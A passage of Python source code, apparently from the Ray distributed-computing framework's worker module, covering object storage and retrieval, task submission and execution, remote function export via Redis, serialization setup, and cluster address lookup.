type(e.example_object), use_dict=True)
warning_message = ("WARNING: Serializing objects of type "
"{} by expanding them as dictionaries "
"of their fields. This behavior may "
"be incorrect in some cases.".format(
type(e.example_object)))
logger.warning(warning_message)
except (serialization.RayNotDictionarySerializable,
serialization.CloudPickleError,
pickle.pickle.PicklingError, Exception):
# We also handle generic exceptions here because
# cloudpickle can fail with many different types of errors.
try:
register_custom_serializer(
type(e.example_object), use_pickle=True)
warning_message = ("WARNING: Falling back to "
"serializing objects of type {} by "
"using pickle. This may be "
"inefficient.".format(
type(e.example_object)))
logger.warning(warning_message)
except serialization.CloudPickleError:
register_custom_serializer(
type(e.example_object),
use_pickle=True,
local=True)
warning_message = ("WARNING: Pickling the class {} "
"failed, so we are using pickle "
"and only registering the class "
"locally.".format(
type(e.example_object)))
logger.warning(warning_message)
def put_object(self, object_id, value):
"""Put value in the local object store with object id objectid.
This assumes that the value for objectid has not yet been placed in the
local object store.
Args:
object_id (object_id.ObjectID): The object ID of the value to be
put.
value: The value to put in the object store.
Raises:
Exception: An exception is raised if the attempt to store the
object fails. This can happen if there is already an object
with the same ID in the object store or if the object store is
full.
"""
# Make sure that the value is not an object ID.
if isinstance(value, ray.ObjectID):
raise Exception("Calling 'put' on an ObjectID is not allowed "
"(similarly, returning an ObjectID from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ObjectID in a list and "
"call 'put' on it (or return it).")
# Serialize and put the object in the object store.
try:
self.store_and_register(object_id, value)
except pyarrow.PlasmaObjectExists as e:
# The object already exists in the object store, so there is no
# need to add it again. TODO(rkn): We need to compare the hashes
# and make sure that the objects are in fact the same. We also
# should return an error code to the caller instead of printing a
# message.
logger.info(
"The object with ID {} already exists in the object store."
.format(object_id))
def retrieve_and_deserialize(self, object_ids, timeout, error_timeout=10):
start_time = time.time()
# Only send the warning once.
warning_sent = False
while True:
try:
# We divide very large get requests into smaller get requests
# so that a single get request doesn't block the store for a
# long time, if the store is blocked, it can block the manager
# as well as a consequence.
results = []
for i in range(0, len(object_ids),
ray._config.worker_get_request_size()):
results += self.plasma_client.get(
object_ids[i:(
i + ray._config.worker_get_request_size())],
timeout, self.serialization_context)
return results
except pyarrow.lib.ArrowInvalid as e:
# TODO(ekl): the local scheduler could include relevant
# metadata in the task kill case for a better error message
invalid_error = RayTaskError(
"<unknown>", None,
"Invalid return value: likely worker died or was killed "
"while executing the task.")
return [invalid_error] * len(object_ids)
except pyarrow.DeserializationCallbackError as e:
# Wait a little bit for the import thread to import the class.
# If we currently have the worker lock, we need to release it
# so that the import thread can acquire it.
if self.mode == WORKER_MODE:
self.lock.release()
time.sleep(0.01)
if self.mode == WORKER_MODE:
self.lock.acquire()
if time.time() - start_time > error_timeout:
warning_message = ("This worker or driver is waiting to "
"receive a class definition so that it "
"can deserialize an object from the "
"object store. This may be fine, or it "
"may be a bug.")
if not warning_sent:
ray.utils.push_error_to_driver(
self,
ray_constants.WAIT_FOR_CLASS_PUSH_ERROR,
warning_message,
driver_id=self.task_driver_id.id())
warning_sent = True
def get_object(self, object_ids):
"""Get the value or values in the object store associated with the IDs.
Return the values from the local object store for object_ids. This will
block until all the values for object_ids have been written to the
local object store.
Args:
object_ids (List[object_id.ObjectID]): A list of the object IDs
whose values should be retrieved.
"""
# Make sure that the values are object IDs.
for object_id in object_ids:
if not isinstance(object_id, ray.ObjectID):
raise Exception("Attempting to call `get` on the value {}, "
"which is not an ObjectID.".format(object_id))
# Do an initial fetch for remote objects. We divide the fetch into
# smaller fetches so as to not block the manager for a prolonged period
# of time in a single call.
plain_object_ids = [
plasma.ObjectID(object_id.id()) for object_id in object_ids
]
for i in range(0, len(object_ids),
ray._config.worker_fetch_request_size()):
if not self.use_raylet:
self.plasma_client.fetch(plain_object_ids[i:(
i + ray._config.worker_fetch_request_size())])
else:
self.local_scheduler_client.reconstruct_objects(
object_ids[i:(
i + ray._config.worker_fetch_request_size())], True)
# Get the objects. We initially try to get the objects immediately.
final_results = self.retrieve_and_deserialize(plain_object_ids, 0)
# Construct a dictionary mapping object IDs that we haven't gotten yet
# to their original index in the object_ids argument.
unready_ids = {
plain_object_ids[i].binary(): i
for (i, val) in enumerate(final_results)
if val is plasma.ObjectNotAvailable
}
was_blocked = (len(unready_ids) > 0)
# Try reconstructing any objects we haven't gotten yet. Try to get them
# until at least get_timeout_milliseconds milliseconds passes, then
# repeat.
while len(unready_ids) > 0:
for unready_id in unready_ids:
self.local_scheduler_client.reconstruct_objects(
[ray.ObjectID(unready_id)], False)
# Do another fetch for objects that aren't available locally yet,
# in case they were evicted since the last fetch. We divide the
# fetch into smaller fetches so as to not block the manager for a
# prolonged period of time in a single call.
object_ids_to_fetch = list(
map(plasma.ObjectID, unready_ids.keys()))
ray_object_ids_to_fetch = list(
map(ray.ObjectID, unready_ids.keys()))
for i in range(0, len(object_ids_to_fetch),
ray._config.worker_fetch_request_size()):
if not self.use_raylet:
self.plasma_client.fetch(object_ids_to_fetch[i:(
i + ray._config.worker_fetch_request_size())])
else:
self.local_scheduler_client.reconstruct_objects(
ray_object_ids_to_fetch[i:(
i + ray._config.worker_fetch_request_size())],
True)
results = self.retrieve_and_deserialize(
object_ids_to_fetch,
max([
ray._config.get_timeout_milliseconds(),
int(0.01 * len(unready_ids))
]))
# Remove any entries for objects we received during this iteration
# so we don't retrieve the same object twice.
for i, val in enumerate(results):
if val is not plasma.ObjectNotAvailable:
object_id = object_ids_to_fetch[i].binary()
index = unready_ids[object_id]
final_results[index] = val
unready_ids.pop(object_id)
# If there were objects that we weren't able to get locally, let the
# local scheduler know that we're now unblocked.
if was_blocked:
self.local_scheduler_client.notify_unblocked()
assert len(final_results) == len(object_ids)
return final_results
def submit_task(self,
function_id,
args,
actor_id=None,
actor_handle_id=None,
actor_counter=0,
is_actor_checkpoint_method=False,
actor_creation_id=None,
actor_creation_dummy_object_id=None,
execution_dependencies=None,
num_return_vals=None,
resources=None,
driver_id=None):
"""Submit a remote task to the scheduler.
Tell the scheduler to schedule the execution of the function with ID
function_id with arguments args. Retrieve object IDs for the outputs of
the function from the scheduler and immediately return them.
Args:
function_id: The ID of the function to execute.
args: The arguments to pass into the function. Arguments can be
object IDs or they can be values. If they are values, they must
be serializable objecs.
actor_id: The ID of the actor that this task is for.
actor_counter: The counter of the actor task.
is_actor_checkpoint_method: True if this is an actor checkpoint
task and false otherwise.
actor_creation_id: The ID of the actor to create, if this is an
actor creation task.
actor_creation_dummy_object_id: If this task is an actor method,
then this argument is the dummy object ID associated with the
actor creation task for the corresponding actor.
execution_dependencies: The execution dependencies for this task.
num_return_vals: The number of return values this function should
have.
resources: The resource requirements for this task.
driver_id: The ID of the relevant driver. This is almost always the
driver ID of the driver that is currently running. However, in
the exceptional case that an actor task is being dispatched to
an actor created by a different driver, this should be the
driver ID of the driver that created the actor.
Returns:
The return object IDs for this task.
"""
with profiling.profile("submit_task", worker=self):
check_main_thread()
if actor_id is None:
assert actor_handle_id is None
actor_id = ray.ObjectID(NIL_ACTOR_ID)
actor_handle_id = ray.ObjectID(NIL_ACTOR_HANDLE_ID)
else:
assert actor_handle_id is not None
if actor_creation_id is None:
actor_creation_id = ray.ObjectID(NIL_ACTOR_ID)
if actor_creation_dummy_object_id is None:
actor_creation_dummy_object_id = (ray.ObjectID(NIL_ID))
# Put large or complex arguments that are passed by value in the
# object store first.
args_for_local_scheduler = []
for arg in args:
if isinstance(arg, ray.ObjectID):
args_for_local_scheduler.append(arg)
elif ray.local_scheduler.check_simple_value(arg):
args_for_local_scheduler.append(arg)
else:
args_for_local_scheduler.append(put(arg))
# By default, there are no execution dependencies.
if execution_dependencies is None:
execution_dependencies = []
if driver_id is None:
driver_id = self.task_driver_id
if resources is None:
raise ValueError("The resources dictionary is required.")
for value in resources.values():
assert (isinstance(value, int) or isinstance(value, float))
if value < 0:
raise ValueError(
"Resource quantities must be nonnegative.")
if (value >= 1 and isinstance(value, float)
and not value.is_integer()):
raise ValueError(
"Resource quantities must all be whole numbers.")
# Submit the task to local scheduler.
task = ray.local_scheduler.Task(
driver_id, ray.ObjectID(
function_id.id()), args_for_local_scheduler,
num_return_vals, self.current_task_id, self.task_index,
actor_creation_id, actor_creation_dummy_object_id, actor_id,
actor_handle_id, actor_counter, is_actor_checkpoint_method,
execution_dependencies, resources, self.use_raylet)
# Increment the worker's task index to track how many tasks have
# been submitted by the current task so far.
self.task_index += 1
self.local_scheduler_client.submit(task)
return task.returns()
def export_remote_function(self, function_id, function_name, function,
max_calls, decorated_function):
"""Export a remote function.
Args:
function_id: The ID of the function.
function_name: The name of the function.
function: The raw undecorated function to export.
max_calls: The maximum number of times a given worker can execute
this function before exiting.
decorated_function: The decorated function (this is used to enable
the remote function to recursively call itself).
"""
check_main_thread()
if self.mode not in [SCRIPT_MODE, SILENT_MODE]:
raise Exception("export_remote_function can only be called on a "
"driver.")
key = (b"RemoteFunction:" + self.task_driver_id.id() + b":" +
function_id.id())
# Work around limitations of Python pickling.
function_name_global_valid = function.__name__ in function.__globals__
function_name_global_value = function.__globals__.get(
function.__name__)
# Allow the function to reference itself as a global variable
if not is_cython(function):
function.__globals__[function.__name__] = decorated_function
try:
pickled_function = pickle.dumps(function)
finally:
# Undo our changes
if function_name_global_valid:
function.__globals__[function.__name__] = (
function_name_global_value)
else:
del function.__globals__[function.__name__]
check_oversized_pickle(pickled_function, function_name,
"remote function", self)
self.redis_client.hmset(
key, {
"driver_id": self.task_driver_id.id(),
"function_id": function_id.id(),
"name": function_name,
"module": function.__module__,
"function": pickled_function,
"max_calls": max_calls
})
self.redis_client.rpush("Exports", key)
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
should not take any arguments. If it returns anything, its
return values will not be used.
"""
check_main_thread()
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.sha1(pickled_function).digest()
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_pickle(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hmset(
key, {
"driver_id": self.task_driver_id.id(),
"function_id": function_to_run_id,
"function": pickled_function
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hmset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def _wait_for_function(self, function_id, driver_id, timeout=10):
"""Wait until the function to be executed is present on this worker.
This method will simply loop until the import thread has imported the
relevant function. If we spend too long in this loop, that may indicate
a problem somewhere and we will push an error message to the user.
If this worker is an actor, then this will wait until the actor has
been defined.
Args:
is_actor (bool): True if this worker is an actor, and false
otherwise.
function_id (str): The ID of the function that we want to execute.
driver_id (str): The ID of the driver to push the error message to
if this times out.
"""
start_time = time.time()
# Only send the warning once.
warning_sent = False
while True:
with self.lock:
if (self.actor_id == NIL_ACTOR_ID
and (function_id.id() in
self.function_execution_info[driver_id])):
break
elif self.actor_id != NIL_ACTOR_ID and (
self.actor_id in self.actors):
break
if time.time() - start_time > timeout:
warning_message = ("This worker was asked to execute a "
"function that it does not have "
"registered. You may have to restart "
"Ray.")
if not warning_sent:
ray.utils.push_error_to_driver(
self,
ray_constants.WAIT_FOR_FUNCTION_PUSH_ERROR,
warning_message,
driver_id=driver_id)
warning_sent = True
time.sleep(0.001)
def _get_arguments_for_execution(self, function_name, serialized_args):
"""Retrieve the arguments for the remote function.
This retrieves the values for the arguments to the remote function that
were passed in as object IDs. Argumens that were passed by value are
not changed. This is called by the worker that is executing the remote
function.
Args:
function_name (str): The name of the remote function whose
arguments are being retrieved.
serialized_args (List): The arguments to the function. These are
either strings representing serialized objects passed by value
or they are ObjectIDs.
Returns:
The retrieved arguments in addition to the arguments that were
passed by value.
Raises:
RayGetArgumentError: This exception is raised if a task that
created one of the arguments failed.
"""
arguments = []
for (i, arg) in enumerate(serialized_args):
if isinstance(arg, ray.ObjectID):
# get the object from the local object store
argument = self.get_object([arg])[0]
if isinstance(argument, RayTaskError):
# If the result is a RayTaskError, then the task that
# created this object failed, and we should propagate the
# error message here.
raise RayGetArgumentError(function_name, i, arg, argument)
else:
# pass the argument by value
argument = arg
arguments.append(argument)
return arguments
def _store_outputs_in_objstore(self, object_ids, outputs):
"""Store the outputs of a remote function in the local object store.
This stores the values that were returned by a remote function in the
local object store. If any of the return values are object IDs, then
these object IDs are aliased with the object IDs that the scheduler
assigned for the return values. This is called by the worker that
executes the remote function.
Note:
The arguments object_ids and outputs should have the same length.
Args:
object_ids (List[ObjectID]): The object IDs that were assigned to
the outputs of the remote function call.
outputs (Tuple): The value returned by the remote function. If the
remote function was supposed to only return one value, then its
output was wrapped in a tuple with one element prior to being
passed into this function.
"""
for i in range(len(object_ids)):
if isinstance(outputs[i], ray.actor.ActorHandle):
raise Exception("Returning an actor handle from a remote "
"function is not allowed).")
self.put_object(object_ids[i], outputs[i])
def _process_task(self, task):
"""Execute a task assigned to this worker.
This method deserializes a task from the scheduler, and attempts to
execute the task. If the task succeeds, the outputs are stored in the
local object store. If the task throws an exception, RayTaskError
objects are stored in the object store to represent the failed task
(these will be retrieved by calls to get or by subsequent tasks that
use the outputs of this task).
"""
# The ID of the driver that this task belongs to. This is needed so
# that if the task throws an exception, we propagate the error
# message to the correct driver.
self.task_driver_id = task.driver_id()
self.current_task_id = task.task_id()
self.task_index = 0
self.put_index = 1
function_id = task.function_id()
args = task.arguments()
return_object_ids = task.returns()
if task.actor_id().id() != NIL_ACTOR_ID:
dummy_return_id = return_object_ids.pop()
function_executor = self.function_execution_info[
self.task_driver_id.id()][function_id.id()].function
function_name = self.function_execution_info[self.task_driver_id.id()][
function_id.id()].function_name
# Get task arguments from the object store.
try:
with profiling.profile("task:deserialize_arguments", worker=self):
arguments = self._get_arguments_for_execution(
function_name, args)
except (RayGetError, RayGetArgumentError) as e:
self._handle_process_task_failure(function_id, return_object_ids,
e, None)
return
except Exception as e:
self._handle_process_task_failure(
function_id, return_object_ids, e,
ray.utils.format_error_message(traceback.format_exc()))
return
# Execute the task.
try:
with profiling.profile("task:execute", worker=self):
if task.actor_id().id() == NIL_ACTOR_ID:
outputs = function_executor(*arguments)
else:
outputs = function_executor(
dummy_return_id, self.actors[task.actor_id().id()],
*arguments)
except Exception as e:
# Determine whether the exception occured during a task, not an
# actor method.
task_exception = task.actor_id().id() == NIL_ACTOR_ID
traceback_str = ray.utils.format_error_message(
traceback.format_exc(), task_exception=task_exception)
self._handle_process_task_failure(function_id, return_object_ids,
e, traceback_str)
return
# Store the outputs in the local object store.
try:
with profiling.profile("task:store_outputs", worker=self):
# If this is an actor task, then the last object ID returned by
# the task is a dummy output, not returned by the function
# itself. Decrement to get the correct number of return values.
num_returns = len(return_object_ids)
if num_returns == 1:
outputs = (outputs, )
self._store_outputs_in_objstore(return_object_ids, outputs)
except Exception as e:
self._handle_process_task_failure(
function_id, return_object_ids, e,
ray.utils.format_error_message(traceback.format_exc()))
def _handle_process_task_failure(self, function_id, return_object_ids,
error, backtrace):
function_name = self.function_execution_info[self.task_driver_id.id()][
function_id.id()].function_name
failure_object = RayTaskError(function_name, error, backtrace)
failure_objects = [
failure_object for _ in range(len(return_object_ids))
]
self._store_outputs_in_objstore(return_object_ids, failure_objects)
# Log the error message.
ray.utils.push_error_to_driver(
self,
ray_constants.TASK_PUSH_ERROR,
str(failure_object),
driver_id=self.task_driver_id.id(),
data={
"function_id": function_id.id(),
"function_name": function_name
})
def _become_actor(self, task):
"""Turn this worker into an actor.
Args:
task: The actor creation task.
"""
assert self.actor_id == NIL_ACTOR_ID
arguments = task.arguments()
assert len(arguments) == 1
self.actor_id = task.actor_creation_id().id()
class_id = arguments[0]
key = b"ActorClass:" + class_id
# Wait for the actor class key to have been imported by the import
# thread. TODO(rkn): It shouldn't be possible to end up in an infinite
# loop here, but we should push an error to the driver if too much time
# is spent here.
while key not in self.imported_actor_classes:
time.sleep(0.001)
with self.lock:
self.fetch_and_register_actor(key, self)
def _wait_for_and_process_task(self, task):
"""Wait for a task to be ready and process the task.
Args:
task: The task to execute.
"""
function_id = task.function_id()
driver_id = task.driver_id().id()
# TODO(rkn): It would be preferable for actor creation tasks to share
# more of the code path with regular task execution.
if (task.actor_creation_id() != ray.ObjectID(NIL_ACTOR_ID)):
self._become_actor(task)
return
# Wait until the function to be executed has actually been registered
# on this worker. We will push warnings to the user if we spend too
# long in this loop.
with profiling.profile("wait_for_function", worker=self):
self._wait_for_function(function_id, driver_id)
# Execute the task.
# TODO(rkn): Consider acquiring this lock with a timeout and pushing a
# warning to the user if we are waiting too long to acquire the lock
# because that may indicate that the system is hanging, and it'd be
# good to know where the system is hanging.
with self.lock:
function_name = (self.function_execution_info[driver_id][
function_id.id()]).function_name
if not self.use_raylet:
extra_data = {
"function_name": function_name,
"task_id": task.task_id().hex(),
"worker_id": binary_to_hex(self.worker_id)
}
else:
extra_data = {
"name": function_name,
"task_id": task.task_id().hex()
}
with profiling.profile("task", extra_data=extra_data, worker=self):
self._process_task(task)
# Push all of the log events to the global state store.
self.profiler.flush_profile_data()
# Increase the task execution counter.
self.num_task_executions[driver_id][function_id.id()] += 1
reached_max_executions = (
self.num_task_executions[driver_id][function_id.id()] == self.
function_execution_info[driver_id][function_id.id()].max_calls)
if reached_max_executions:
self.local_scheduler_client.disconnect()
os._exit(0)
def _get_next_task_from_local_scheduler(self):
"""Get the next task from the local scheduler.
Returns:
A task from the local scheduler.
"""
with profiling.profile("get_task", worker=self):
task = self.local_scheduler_client.get_task()
# Automatically restrict the GPUs available to this task.
ray.utils.set_cuda_visible_devices(ray.get_gpu_ids())
return task
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def exit(signum, frame):
shutdown(worker=self)
sys.exit(0)
signal.signal(signal.SIGTERM, exit)
check_main_thread()
while True:
task = self._get_next_task_from_local_scheduler()
self._wait_for_and_process_task(task)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
if _mode() == LOCAL_MODE:
raise Exception("ray.get_gpu_ids() currently does not work in PYTHON "
"MODE.")
if not global_worker.use_raylet:
assigned_ids = global_worker.local_scheduler_client.gpu_ids()
else:
all_resource_ids = global_worker.local_scheduler_client.resource_ids()
assigned_ids = [
resource_id for resource_id, _ in all_resource_ids.get("GPU", [])
]
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
return assigned_ids
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
This function is only supported in the raylet code path.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
if not global_worker.use_raylet:
raise Exception("ray.get_resource_ids() is only supported in the "
"raylet code path.")
if _mode() == LOCAL_MODE:
raise Exception(
"ray.get_resource_ids() currently does not work in PYTHON "
"MODE.")
return global_worker.local_scheduler_client.resource_ids()
def _webui_url_helper(client):
"""Parsing for getting the url of the web UI.
Args:
client: A redis client to use to query the primary Redis shard.
Returns:
The URL of the web UI as a string.
"""
result = client.hmget("webui", "url")[0]
return ray.utils.decode(result) if result is not None else result
def get_webui_url():
"""Get the URL to access the web UI.
Note that the URL does not specify which node the web UI is on.
Returns:
The URL of the web UI as a string.
"""
if _mode() == LOCAL_MODE:
raise Exception("ray.get_webui_url() currently does not work in "
"PYTHON MODE.")
return _webui_url_helper(global_worker.redis_client)
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
global_state = state.GlobalState()
class RayConnectionError(Exception):
pass
def check_main_thread():
"""Check that we are currently on the main thread.
Raises:
Exception: An exception is raised if this is called on a thread other
than the main thread.
"""
if threading.current_thread().getName() != "MainThread":
raise Exception("The Ray methods are not thread safe and must be "
"called from the main thread. This method was called "
"from thread {}."
.format(threading.current_thread().getName()))
def print_failed_task(task_status):
"""Print information about failed tasks.
Args:
task_status (Dict): A dictionary containing the name, operationid, and
error message for a failed task.
"""
logger.error("""
Error: Task failed
Function Name: {}
Task ID: {}
Error Message: \n{}
""".format(task_status["function_name"], task_status["operationid"],
task_status["error_message"]))
def error_applies_to_driver(error_key, worker=global_worker):
"""Return True if the error is for this driver and false otherwise."""
# TODO(rkn): Should probably check that this is only called on a driver.
# Check that the error key is formatted as in push_error_to_driver.
assert len(error_key) == (len(ERROR_KEY_PREFIX) + DRIVER_ID_LENGTH + 1 +
ERROR_ID_LENGTH), error_key
# If the driver ID in the error message is a sequence of all zeros, then
# the message is intended for all drivers.
generic_driver_id = DRIVER_ID_LENGTH * b"\x00"
driver_id = error_key[len(ERROR_KEY_PREFIX):(
len(ERROR_KEY_PREFIX) + DRIVER_ID_LENGTH)]
return (driver_id == worker.task_driver_id.id()
or driver_id == generic_driver_id)
def error_info(worker=global_worker):
"""Return information about failed tasks."""
worker.check_connected()
check_main_thread()
if worker.use_raylet:
return (global_state.error_messages(job_id=worker.task_driver_id) +
global_state.error_messages(job_id=ray_constants.NIL_JOB_ID))
error_keys = worker.redis_client.lrange("ErrorKeys", 0, -1)
errors = []
for error_key in error_keys:
if error_applies_to_driver(error_key, worker=worker):
error_contents = worker.redis_client.hgetall(error_key)
error_contents = {
"type": ray.utils.decode(error_contents[b"type"]),
"message": ray.utils.decode(error_contents[b"message"]),
"data": ray.utils.decode(error_contents[b"data"])
}
errors.append(error_contents)
return errors
def _initialize_serialization(worker=global_worker):
"""Initialize the serialization library.
This defines a custom serializer for object IDs and also tells ray to
serialize several exception classes that we define for error handling.
"""
worker.serialization_context = pyarrow.default_serialization_context()
# Tell the serialization context to use the cloudpickle version that we
# ship with Ray.
worker.serialization_context.set_pickle(pickle.dumps, pickle.loads)
pyarrow.register_torch_serialization_handlers(worker.serialization_context)
# Define a custom serializer and deserializer for handling Object IDs.
def object_id_custom_serializer(obj):
return obj.id()
def object_id_custom_deserializer(serialized_obj):
return ray.ObjectID(serialized_obj)
# We register this serializer on each worker instead of calling
# register_custom_serializer from the driver so that isinstance still
# works.
worker.serialization_context.register_type(
ray.ObjectID,
"ray.ObjectID",
pickle=False,
custom_serializer=object_id_custom_serializer,
custom_deserializer=object_id_custom_deserializer)
def actor_handle_serializer(obj):
return obj._serialization_helper(True)
def actor_handle_deserializer(serialized_obj):
new_handle = ray.actor.ActorHandle.__new__(ray.actor.ActorHandle)
new_handle._deserialization_helper(serialized_obj, True)
return new_handle
# We register this serializer on each worker instead of calling
# register_custom_serializer from the driver so that isinstance still
# works.
worker.serialization_context.register_type(
ray.actor.ActorHandle,
"ray.ActorHandle",
pickle=False,
custom_serializer=actor_handle_serializer,
custom_deserializer=actor_handle_deserializer)
if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
# These should only be called on the driver because
# register_custom_serializer will export the class to all of the
# workers.
register_custom_serializer(RayTaskError, use_dict=True)
register_custom_serializer(RayGetError, use_dict=True)
register_custom_serializer(RayGetArgumentError, use_dict=True)
# Tell Ray to serialize lambdas with pickle.
register_custom_serializer(type(lambda: 0), use_pickle=True)
# Tell Ray to serialize types with pickle.
register_custom_serializer(type(int), use_pickle=True)
# Tell Ray to serialize FunctionSignatures as dictionaries. This is
# used when passing around actor handles.
register_custom_serializer(
ray.signature.FunctionSignature, use_dict=True)
def get_address_info_from_redis_helper(redis_address,
node_ip_address,
use_raylet=False):
redis_ip_address, redis_port = redis_address.split(":")
# For this command to work, some other client (on the same machine as
# Redis) must have run "CONFIG SET protected-mode no".
redis_client = redis.StrictRedis(
host=redis_ip_address, port=int(redis_port))
if not use_raylet:
# The client table prefix must be kept in sync with the file
# "src/common/redis_module/ray_redis_module.cc" where it is defined.
client_keys = redis_client.keys("{}*".format(
ray.gcs_utils.DB_CLIENT_PREFIX))
# Filter to live clients on the same node and do some basic checking.
plasma_managers = []
local_schedulers = []
for key in client_keys:
info = redis_client.hgetall(key)
# Ignore clients that were deleted.
deleted = info[b"deleted"]
deleted = bool(int(deleted))
if deleted:
continue
assert b"ray_client_id" in info
assert b"node_ip_address" in info
assert b"client_type" in info
client_node_ip_address = ray.utils.decode(info[b"node_ip_address"])
if (client_node_ip_address == node_ip_address or
(client_node_ip_address == "127.0.0.1"
and redis_ip_address == ray.services.get_node_ip_address())):
if ray.utils.decode(info[b"client_type"]) == "plasma_manager":
plasma_managers.append(info)
elif (ray.utils.decode(
info[b"client_type"]) == "local_scheduler"):
local_schedulers.append(info)
# Make sure that we got at least one plasma manager and local
# scheduler.
assert len(plasma_managers) >= 1
assert len(local_schedulers) >= 1
# Build the address information.
object_store_addresses = []
for manager in plasma_managers:
address = ray.utils.decode(manager[b"manager_address"])
port = services.get_port(address)
object_store_addresses.append(
services.ObjectStoreAddress(
name=ray.utils.decode(manager[b"store_socket_name"]),
manager_name=ray.utils.decode(
manager[b"manager_socket_name"]),
manager_port=port))
scheduler_names = [
ray.utils.decode(scheduler[b"local_scheduler_socket_name"])
for scheduler in local_schedulers
]
client_info = {
"node_ip_address": node_ip_address,
"redis_address": redis_address,
"object_store_addresses": object_store_addresses,
"local_scheduler_socket_names": scheduler_names,
# Web UI should be running.
"webui_url": _webui_url_helper(redis_client)
}
return client_info
# Handle the raylet case.
else:
# In the raylet code path, all client data is stored in a zset at the
# key for the nil client.
client_key = b"CLIENT" + NIL_CLIENT_ID
clients = redis_client.zrange(client_key, 0, -1)
raylets = []
for client_message in clients:
client = ray.gcs_utils.ClientTableData.GetRootAsClientTableData(
client_message, 0)
client_node_ip_address = ray.utils.decode(
client.NodeManagerAddress())
if (client_node_ip_address == node_ip_address or
(client_node_ip_address == "127.0.0.1"
and redis_ip_address == ray.services.get_node_ip_address())):
raylets.append(client)
object_store_addresses = [
services.ObjectStoreAddress(
name=ray.utils.decode(raylet.ObjectStoreSocketName()),
manager_name=None,
manager_port=None) for raylet in raylets
]
raylet_socket_names = [
ray.utils.decode(raylet.RayletSocketName()) for raylet in raylets
]
return {
"node_ip_address": node_ip_address,
"redis_address": redis_address,
"object_store_addresses": object_store_addresses,
"raylet_socket_names": raylet_socket_names,
# Web UI should be running.
"webui_url": _webui_url_helper(redis_client)
}
def get_address_info_from_redis(redis_address,
node_ip_address,
num_retries=5,
use_raylet=False):
counter = 0
while True:
try:
return get_address_info_from_redis_helper(
redis_address, node_ip_address, use_raylet=use_raylet)
except Exception as e:
if counter == num_retries:
raise
# Some of the information may not be in Redis yet, so wait a little
# bit.
logger.warning(
"Some processes that the driver needs to connect to have "
"not registered with Redis, so retrying. Have you run "
"'ray start' on this node?")
time.sleep(1)
counter += 1
def _normalize_resource_arguments(num_cpus, num_gpus, resources,
num_local_schedulers):
"""Stick the CPU and GPU arguments into the resources dictionary.
This also checks that the arguments are well-formed.
Args:
num_cpus: Either a number of CPUs or a list of numbers of CPUs.
num_gpus: Either a number of CPUs or a list of numbers of CPUs.
resources: Either a dictionary of resource mappings or a list of
dictionaries of resource mappings.
num_local_schedulers: The number of local schedulers.
Returns:
A list of dictionaries of resources of length num_local_schedulers.
"""
if resources is None:
resources = {}
if not isinstance(num_cpus, list):
num_cpus = num_local_schedulers * [num_cpus]
if not isinstance(num_gpus, list):
num_gpus = num_local_schedulers * [num_gpus]
if not isinstance(resources, list):
resources = num_local_schedulers * [resources]
new_resources = [r.copy() for r in resources]
for i in range(num_local_schedulers):
assert "CPU" not in new_resources[i], "Use the 'num_cpus' argument."
assert "GPU" not in new_resources[i], "Use the 'num_gpus' argument."
if num_cpus[i] is not None:
new_resources[i]["CPU"] = num_cpus[i]
if num_gpus[i] is not None:
new_resources[i]["GPU"] = num_gpus[i]
return new_resources
def _init(address_info=None,
start_ray_local=False,
object_id_seed=None,
num_workers=None,
num_local_schedulers=None,
object_store_memory=None,
driver_mode=SCRIPT_MODE,
redirect_worker_output=False,
redirect_output=True,
start_workers_from_local_scheduler=True,
num_cpus=None,
num_gpus=None,
resources=None,
num_redis_shards=None,
redis_max_clients=None,
plasma_directory=None,
huge_pages=False,
include_webui=True,
use_raylet=None):
"""Helper method to connect to an existing Ray cluster or start a new one.
This method handles two cases. Either a Ray cluster already exists and we
just attach this driver to it, or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
Args:
address_info (dict): A dictionary with address information for
processes in a partially-started Ray cluster. If
start_ray_local=True, any processes not in this dictionary will be
started. If provided, an updated address_info dictionary will be
returned to include processes that are newly started.
start_ray_local (bool): If True then this will start any processes not
already in address_info, including Redis, a global scheduler, local
scheduler(s), object store(s), and worker(s). It will also kill
these processes when Python exits. If False, this will attach to an
existing Ray cluster.
object_id_seed (int): Used to seed the deterministic generation of
object IDs. The same value can be used across multiple runs of the
same job in order to generate the object IDs in a consistent
manner. However, the same ID should not be used for different jobs.
num_workers (int): The number of workers to start. This is only
provided if start_ray_local is True.
